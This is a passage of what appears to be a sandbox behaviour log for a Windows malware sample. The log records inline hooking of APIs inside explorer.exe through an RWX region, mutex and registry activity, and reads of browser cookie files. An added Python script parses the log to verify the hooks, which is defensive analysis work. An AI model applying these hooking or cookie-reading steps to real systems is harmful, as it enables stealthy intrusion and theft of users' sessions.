Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 77212EBC Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629890370
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 77212EBC Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 2629890690
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30014 Length: 10 Value: 8B FF 55 8B EC E9 A3 2E 2E 76 success or wait 2629900807
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 77212EBC Length: 5 Value: E9 FD 4B 27 8A success or wait 2629901724
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 77212EBC Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629902048
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C60A1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629902897
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C60A1 Length: 30 Value: 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 2629904045
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F3001E Length: 10 Value: 8B FF 55 8B EC E9 7E 60 29 76 success or wait 2629905072
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C60A1 Length: 5 Value: E9 6F 1A 2C 8A success or wait 2629905986
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C60A1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629906309
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771CE9C1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629908558
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771CE9C1 Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 56 33 C0 57 33 D2 33 DB 33 FF 33 C9 39 55 08 89 45 F8 89 45 EC success or wait 2629908864
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30028 Length: 10 Value: 8B FF 55 8B EC E9 94 E9 29 76 success or wait 2629909951
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771CE9C1 Length: 5 Value: E9 A6 91 2B 8A success or wait 2629910862
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771CE9C1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629911184
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 77212FC1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629912217
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 77212FC1 Length: 30 Value: 8B FF 55 8B EC 53 56 57 33 DB 33 C0 33 C9 33 D2 33 FF 39 5D 10 75 39 8B 75 0C 85 F6 74 21 success or wait 2629912521
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30032 Length: 10 Value: 8B FF 55 8B EC E9 8A 2F 2E 76 success or wait 2629918508
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 77212FC1 Length: 5 Value: E9 4B 4C 27 8A success or wait 2629921186
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 77212FC1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629921860
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C4D8C Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629924260
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C4D8C Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 33 DB 33 F6 F6 05 94 BD 23 77 01 89 5D FC 0F 84 BA 7E 00 00 39 success or wait 2629926078
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F3003C Length: 10 Value: 8B FF 55 8B EC E9 4B 4D 29 76 success or wait 2629932929
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C4D8C Length: 5 Value: E9 25 2F 2C 8A success or wait 2629938255
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C4D8C Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629938644
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C82EA Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629940960
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C82EA Length: 30 Value: 8B FF 55 8B EC 83 EC 24 53 33 DB 39 1D 8C B8 23 77 57 89 5D F4 89 5D F8 89 5D F0 C7 45 E8 success or wait 2629942306
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30046 Length: 10 Value: 8B FF 55 8B EC E9 9F 82 29 76 success or wait 2629944504
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C82EA Length: 5 Value: E9 0A FA 2B 8A success or wait 2629945456
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C82EA Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629945775
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771F9100 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629947211
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771F9100 Length: 30 Value: 8B FF 55 8B EC 83 EC 20 53 56 33 C0 57 33 FF 40 39 3D 8C B8 23 77 89 7D FC 89 7D F8 89 45 success or wait 2629948664
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30050 Length: 10 Value: 8B FF 55 8B EC E9 AB 90 2C 76 success or wait 2629951297
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771F9100 Length: 5 Value: E9 34 EC 28 8A success or wait 2629956328
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771F9100 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629958568
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771D89F7 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629963659
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771D89F7 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D 8C B8 23 77 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 2629964372
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F3005A Length: 10 Value: 8B FF 55 8B EC E9 98 89 2A 76 success or wait 2629966383
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771D89F7 Length: 5 Value: E9 8B F3 2A 8A success or wait 2629971247
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771D89F7 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629972143
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C79C2 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629976391
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C79C2 Length: 30 Value: 6A 2C 68 10 7B 1C 77 E8 A7 9C FE FF 33 DB 89 5D DC 89 5D E4 39 1D 8C B8 23 77 0F 84 E8 95 success or wait 2629978609
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30064 Length: 12 Value: 6A 2C 68 10 7B 1C 77 E9 59 79 29 76 success or wait 2629984519
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C79C2 Length: 5 Value: E9 F0 03 2C 8A success or wait 2629991520
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C79C2 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629993757
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771F9C53 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629997075
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771F9C53 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 0C FF 75 08 E8 1A F4 FD FF 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 2629999278
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30070 Length: 10 Value: 8B FF 55 8B EC E9 DE 9B 2C 76 success or wait 2630012766
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771F9C53 Length: 5 Value: E9 B4 E1 28 8A success or wait 2630018909
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771F9C53 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2630019967
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771D9064 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2630024169
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771D9064 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 2630026393
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F3007A Length: 10 Value: 8B FF 55 8B EC E9 E5 8F 2A 76 success or wait 2630033368
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771D9064 Length: 5 Value: E9 BB ED 2A 8A success or wait 2630039075
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771D9064 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2630041320
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771BB1D8 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2630046723
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771BB1D8 Length: 30 Value: 8B FF 55 8B EC 83 EC 48 53 8B 5D 10 56 33 F6 39 75 14 57 8B 7D 0C C7 45 F4 01 00 00 00 89 success or wait 2630048934
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30084 Length: 10 Value: 8B FF 55 8B EC E9 4F B1 28 76 success or wait 2630054931
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771BB1D8 Length: 5 Value: E9 5F CC 2C 8A success or wait 2630061113
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771BB1D8 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2630062003
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 71AB3E2B Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2630064708
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 71AB3E2B Length: 30 Value: 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 2630066907
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F3008E Length: 10 Value: 8B FF 55 8B EC E9 98 3D B8 70 success or wait 2630075188
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 71AB3E2B Length: 5 Value: E9 3E E9 9D 8F success or wait 2630083347
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 71AB3E2B Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2630083674
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 71AB4C27 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 2630085769
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 71AB68FA Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 2630092807
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 71AB676F Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 5E 4A 00 00 8D 45 success or wait 2630120051
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 71AB4CB5 Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 80 65 00 00 8D 45 F8 50 E8 DD success or wait 2630140943
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E41ECA3 Length: 30 Value: B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 2630159862
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E41FE6E Length: 30 Value: B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 2630167181
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E428D20 Length: 30 Value: 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2630190091
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E42C17E Length: 30 Value: 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2630212330
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E423D3A Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2630218971
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E43E577 Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2630238180
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E430833 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 2630246991
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E44F965 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 2630250586
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E430A47 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 2630254822
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E44F9B4 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 2630258321
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7E42A01E Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 2630262494
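The memory read/write lines above are the raw record of inline hooking inside explorer.exe: the sample allocates a large RWX region at F30000, reads the first 30 bytes of each target API (the first two reads decode to ntdll-style system-call stubs, `mov eax, imm32 / mov edx, 7FFE0300h / call [edx]`; the others start with the hot-patchable `8B FF 55 8B EC` prologue), copies the displaced bytes plus a `jmp` back into the RWX region, and then overwrites the prologue with a 5-byte `E9 rel32` jump. The script below is an added example, not part of the Joebox report: it parses those lines, decodes each `rel32`, and verifies that every hook jumps into the RWX allocation and that every trampoline restores the original prologue bytes and resumes exactly after the overwritten bytes (including the 7-byte case at 771C79C2, where the 5-byte patch would split a `push imm32`). It assumes the line grammar shown above, treats `Base` and the allocation `Length` as hex, and counts bytes from the `Value` field rather than trusting the `Length` column.

```python
"""Verify the inline hooks recorded by the memory read/write lines above.

Added example, not part of the Joebox report. It assumes the report's line
grammar (Memory allocated / read / written ... Base: <hex> ... Value: <hex
bytes>) and the classic 5-byte hook: the API prologue is overwritten with
`E9 rel32`, and the displaced ("stolen") bytes are copied into a trampoline
in the RWX allocation that ends with a `jmp` back to prologue + stolen length.
Base addresses are hex; the allocation Length is read as hex as well.
"""
import re
import struct
from dataclasses import dataclass

# Lines quoted from the report (the RWX allocation and four hooked prologues).
LOG = r"""
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30000 Length: 29FF4C0 Allocation Type: null Protection: page execute and read and write success or wait 2629851899
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 2629856944
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 9D 7B success or wait 2629860570
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7C90D1AE Length: 5 Value: E9 A4 AE B8 84 success or wait 2629873842
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 2629877896
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F3000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 9E 7B success or wait 2629881609
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7C91632D Length: 5 Value: E9 09 1F B8 84 success or wait 2629887786
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C79C2 Length: 30 Value: 6A 2C 68 10 7B 1C 77 E8 A7 9C FE FF 33 DB 89 5D DC 89 5D E4 39 1D 8C B8 23 77 0F 84 E8 95 success or wait 2629978609
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30064 Length: 12 Value: 6A 2C 68 10 7B 1C 77 E9 59 79 29 76 success or wait 2629984519
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 771C79C2 Length: 5 Value: E9 F0 03 2C 8A success or wait 2629991520
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 71AB3E2B Length: 30 Value: 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 2630066907
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F3008E Length: 10 Value: 8B FF 55 8B EC E9 98 3D B8 70 success or wait 2630075188
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 71AB3E2B Length: 5 Value: E9 3E E9 9D 8F success or wait 2630083347
"""

LINE_RE = re.compile(r"^Memory (?P<kind>allocated|read|written) .*?Base: (?P<base>[0-9A-F]+) "
                     r"Length: (?P<len>[0-9A-F]+)(?P<rest>.*)$")
VALUE_RE = re.compile(r"Value: ((?:[0-9A-F]{2} )+)")


@dataclass
class Hook:
    api: int          # hooked prologue address
    handler: int      # where the jmp written over the prologue lands
    trampoline: int   # stub holding the stolen bytes + jmp back
    stolen: bytes     # bytes displaced by the 5-byte jmp


def rel32_target(at: int, code: bytes) -> int:
    """Destination of the `E9 rel32` at `at`, with 32-bit wraparound."""
    (rel,) = struct.unpack("<i", code[1:5])
    return (at + 5 + rel) & 0xFFFFFFFF


def parse(log: str):
    """Split the log into RWX regions, bytes read and bytes written, keyed by address."""
    rwx, reads, writes = [], {}, {}
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        base = int(m["base"], 16)
        if m["kind"] == "allocated":
            if "execute" in m["rest"] and "write" in m["rest"]:
                rwx.append((base, base + int(m["len"], 16)))
        elif (v := VALUE_RE.search(m["rest"])):
            (reads if m["kind"] == "read" else writes)[base] = bytes.fromhex(v.group(1))
    return rwx, reads, writes


def in_rwx(addr, rwx):
    return any(lo <= addr < hi for lo, hi in rwx)


def find_hooks(log: str):
    rwx, reads, writes = parse(log)
    hooks = []
    for api, patch in writes.items():
        # A 5-byte jmp written over bytes the sample had read first (the prologue).
        if len(patch) != 5 or patch[0] != 0xE9 or api not in reads:
            continue
        handler = rel32_target(api, patch)
        if not in_rwx(handler, rwx):
            continue  # jumps into a module, not into injected code: not this pattern
        for taddr, stub in writes.items():
            n = len(stub) - 5  # stolen length; 7 when the 5th byte would split an instruction
            if n < 5 or stub[n] != 0xE9 or not in_rwx(taddr, rwx):
                continue
            # The stolen bytes must equal the original prologue and the stub must
            # resume exactly after the bytes the hook overwrote.
            if stub[:n] == reads[api][:n] and rel32_target(taddr + n, stub[n:]) == api + n:
                hooks.append(Hook(api, handler, taddr, stub[:n]))
                break
    return sorted(hooks, key=lambda h: h.trampoline)


if __name__ == "__main__":
    for h in find_hooks(LOG):
        print(f"{h.api:08X} -> {h.handler:08X}  trampoline {h.trampoline:08X}: "
              f"{h.stolen.hex(' ')} ; jmp {h.api + len(h.stolen):08X}")
```

Run against the quoted lines, all four patches resolve to handlers inside the F30000 allocation (01498057, 0149823B, 01487DB7, 0149276E) and all four trampolines jump back to prologue + stolen length, which is the check a reviewer would want before labelling a "Memory written" pair as a hook rather than an unrelated patch. The reads at 71AB4C27 onward that have no matching write are prologues the sample inspected but did not patch within the logged window.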
System info queried Type: ProcessInformation success or wait 2630626183
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2630635473
Thread created PID: 1520 TID: 536 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2631096106
Mutant created Name: \BaseNamedObjects\Global\{41836DC6-D3BA-F066-FB56-FD56EA1DDE44} success or wait 2631099496
Thread delayed Time: 15 TID: 1334 success or wait 2631100946
System info queried Type: ProcessInformation success or wait 2631103515
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2631110520
Thread created PID: 1520 TID: 168 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2631451983
Mutant created Name: \BaseNamedObjects\Global\{97855BF5-E589-2660-FB56-FD56EA1DDE44} success or wait 2631458002
System info queried Type: ProcessInformation success or wait 2631460900
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2631467923
Thread created PID: 1520 TID: 1920 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2632232221
Mutant created Name: \BaseNamedObjects\Global\{9B698CC0-32BC-2A8C-FB56-FD56EA1DDE44} success or wait 2632234818
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 19j6cd23 success or wait 2632235794
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 19j6cd23 success or wait 2632236352
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 18457c7d object name not found 2632237031
System info queried Type: ProcessInformation success or wait 2632237889
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2632245550
Thread created PID: 1520 TID: 1448 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2632594590
Mutant created Name: \BaseNamedObjects\Global\{9B698CC7-32BB-2A8C-FB56-FD56EA1DDE44} success or wait 2632596776
File opened Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2632597772
Mutant created Name: \BaseNamedObjects\Global\{642AE024-5E58-D5CF-FB56-FD56EA1DDE44} success or wait 2632599006
System info queried Type: ProcessInformation success or wait 2632601556
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2632609101
File moved New path: unknown Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi success or wait 2632613869
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 19j6cd23 success or wait 2632630281
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 19j6cd23 success or wait 2632653113
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 18457c7d object name not found 2632659690
Thread created PID: 1520 TID: 1100 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2632920768
Mutant created Name: \BaseNamedObjects\Local\{FA8F3AD4-84A8-4B6A-FB56-FD56EA1DDE44} success or wait 2632923138
System info queried Type: ProcessInformation success or wait 2632925507
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2632932449
Thread created PID: 1520 TID: 1716 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2633095320
Mutant created Name: \BaseNamedObjects\Local\{FA8F3AD5-84A9-4B6A-FB56-FD56EA1DDE44} success or wait 2633097511
System info queried Type: ProcessInformation success or wait 2633100480
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2633108455
Thread created PID: 1520 TID: 508 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2633260445
Mutant created Name: \BaseNamedObjects\Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44} success or wait 2633262441
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 15807505 object name not found 2633262995
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633274679
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633277180
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt Offset: none Length: 169 Value: 75 0A 34 65 64 37 66 30 66 62 63 37 62 36 64 0A 61 64 2E 77 73 6F 64 2E 63 6F 6D 2F 0A 31 30 32 34 0A 34 32 31 34 36 35 36 0A 33 30 31 39 37 39 36 34 0A 34 36 37 34 30 34 34 30 30 0A 33 30 31 39 31 37 32 35 0A 2A 0A 69 5F 31 0A 33 33 3A 32 33 37 33 3A 31 32 32 35 3A 30 3A 30 3A 35 37 37 32 35 3A 31 success or wait 2633277480
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@addthis[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633279707
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633282702
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@addthis[1].txt Offset: none Length: 228 Value: 75 69 64 0A 34 65 64 37 65 36 61 30 38 34 33 62 62 61 64 63 0A 61 64 64 74 68 69 73 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 39 32 39 32 36 34 38 39 36 0A 33 30 33 33 38 37 37 34 0A 34 36 35 35 31 36 32 38 38 0A 33 30 31 39 31 37 32 32 0A 2A 0A 75 76 63 0A 33 7C 34 38 0A 61 64 64 74 68 69 success or wait 2633283009
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633285066
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633287573
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt Offset: none Length: 232 Value: 6D 62 6F 78 0A 63 68 65 63 6B 23 74 72 75 65 23 31 33 30 32 32 37 39 33 35 36 7C 73 65 73 73 69 6F 6E 23 31 33 30 32 32 37 39 32 34 30 39 31 38 2D 39 35 32 36 31 35 23 31 33 30 32 32 38 31 31 35 36 0A 61 64 6F 62 65 2E 63 6F 6D 2F 0A 31 36 30 30 0A 31 38 34 39 37 36 38 34 34 38 0A 33 30 31 34 34 30 success or wait 2633287879
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633290144
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633292635
